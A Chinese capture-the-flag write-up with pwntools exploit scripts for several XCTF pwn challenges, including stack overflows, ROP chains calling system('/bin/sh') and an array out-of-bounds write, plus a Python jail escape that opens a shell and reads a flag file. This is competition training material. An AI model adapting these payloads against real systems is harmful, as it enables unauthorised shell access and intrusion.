CTF-XCTF-Pwn-高手进阶区(1)

CTF-XCTF-高手进阶区(1)

0x1

dice_game

附件下载 dice_game.rar

可以通过栈溢出覆盖seed，我将其覆盖成0，然后本地做一个程序输出rand()50次的结果，然后发送过去就好了

from pwn import *
context.log_level = "debug"
context.arch = "amd64"
elf = ELF("dice_game")
sh = 0
lib = 0
answer = [2,5,4,2,6,2,5,1,4,2,3,2,3,2,6,5,1,1,5,5,6,3,4,4,3,3,3,2,2,2,6,1,1,1,6,4,2,5,2,5,4,4,4,6,3,2,3,3,6,1]
def pwn(ip,port,debug):
	global sh
	global lib
	if(debug == 1):
		sh = process("./dice_game")
	else:
		sh = remote(ip,port)
	sh.recvuntil("Welcome, let me know your name: ")
	payload = '\x00' * (0x50-0x4) + "\x32"
	sh.send(payload)
	sh.recvuntil("Game ")
	for i in answer:
		sh.sendline(str(i))
		sh.recv()
	sh.interactive()
if __name__ == "__main__":
	pwn("111.198.29.45",45778,0)

0x2

warmup

附件下载 warmup.rar

典型的ROP题

from pwn import *
context.log_level = "debug"
context.arch = "amd64"
elf = ELF("warmup")
sh = 0
lib = 0
def pwn(ip,port,debug):
	global sh
	global lib
	if(debug == 1):
		sh = process("./warmup")

	else:
		sh = remote(ip,port)
	pop_rdi_ret = 0x0000000000400713
	payload = "a" * 72 + p64(pop_rdi_ret) + p64(elf.bss()) + p64(elf.plt["gets"]) + p64(pop_rdi_ret) + p64(elf.bss()) + p64(elf.plt['system'])
	sh.send(payload)
	sleep(1)
	sh.sendline("/bin/sh\x00")
	sh.interactive()
if __name__ == "__main__":
	pwn("111.198.29.45",31657,0)

0x3

forgot

附件下载 forgot.rar

from pwn import *
context.log_level = "debug"
context.arch = "i386"
elf = ELF("forgot")
sh = 0
lib = 0
def pwn(ip,port,debug):
	global sh
	global lib
	if(debug == 1):
		sh = process("./forgot")

	else:
		sh = remote(ip,port)
	getFlag = 0x080486CC
	sh.recvuntil("What is your name?")
	payload = "2" + p32(getFlag) * 7 
	payload = payload.ljust(0x20,"a")
	sh.send(payload)
	sh.recvuntil("Enter the string to be validate")
	payload = "aaa"+18 * p32(getFlag)
	payload = payload.ljust(18 * 4,"a")
	sh.send(payload)
	sh.sendline("123")
	sh.interactive()
if __name__ == "__main__":
	pwn("111.198.29.45",36236,0)

0x4

stack2

附件下载 stack2.rar

存在数组溢出，即change number可以实现栈内任意地址写

XCTF服务器中，由于没有/bin/bash，所以可以考虑取/bin/bash的后两位（即，sh）作为指针传入参数，然后ROP执行system

from pwn import *

context.log_level = "debug"

context.arch = "i386"

elf = ELF("stack2")

sh = 0

lib = 0

def writeNum(num,position):

	sh.recvuntil("1. show numbers\n2. add number\n3. change number\n4. get average\n5. exit")

	sh.sendline("3")

	sh.recvuntil("which number to change:")

	sh.sendline(str(position))

	sh.recvuntil("new number:")

	sh.sendline(str(num))

def writeROP(num,position):

	p = position

	n1 = num >> 24

	n2 = (num % 0x1000000) >> 16

	n3 = (num % 0x10000) >> 8

	n4 = (num % 0x100)

	writeNum(n4,p)

	writeNum(n3,p+1)

	writeNum(n2,p+2)

	writeNum(n1,p+3)

	return p+4

def pwn(ip,port,debug):

	global sh

	global lib

	if(debug == 1):

		sh = process("./stack2")


	else:

		sh = remote(ip,port)
	#0x080488F2
	getShell_addr = 0x0804859B

	sh.recvuntil("How many numbers you have:")

	sh.sendline("1")

	sh.recvuntil("Give me your numbers\n")

	sh.sendline("3")

	
offset = 0x84

	offset = writeROP(0x080485B4,offset)

	offset = writeROP(0x08048980 + 7,offset)

	sh.recvuntil("1. show numbers\n2. add number\n3. change number\n4. get average\n5. exit")

	sh.sendline("5")

	sh.interactive()

if __name__ == "__main__":

	pwn("111.198.29.45",48028,0)

0x5

Escape_From_Jail-50

题目里只给了IP和端口，连进去发现是python的终端，然后发现禁用了import os、fopen等功能

getattr(os,"system")("/bin/sh")	//这条代码可以不通过	import os 来调用os库里的代码
	bin
	boot
	dev
	etc
	home
	lib
	lib32
	lib64
	media
	mnt
	opt
	proc
	root
	run
	sbin
	srv
	sys
	tmp
	usr
	var
find / -name flag
	/home/ctf/flag
cat /home/ctf/flag
	cyberpeace{8ea4ff446652fd6ec97eb041a4aba19e}

0x6

monkey

直接运行程序，类似于python终端，然后随意输入一个print(“123”)，然后有输出，接着随意输入read，发现有readFile函数

read("flag")	//会反弹flag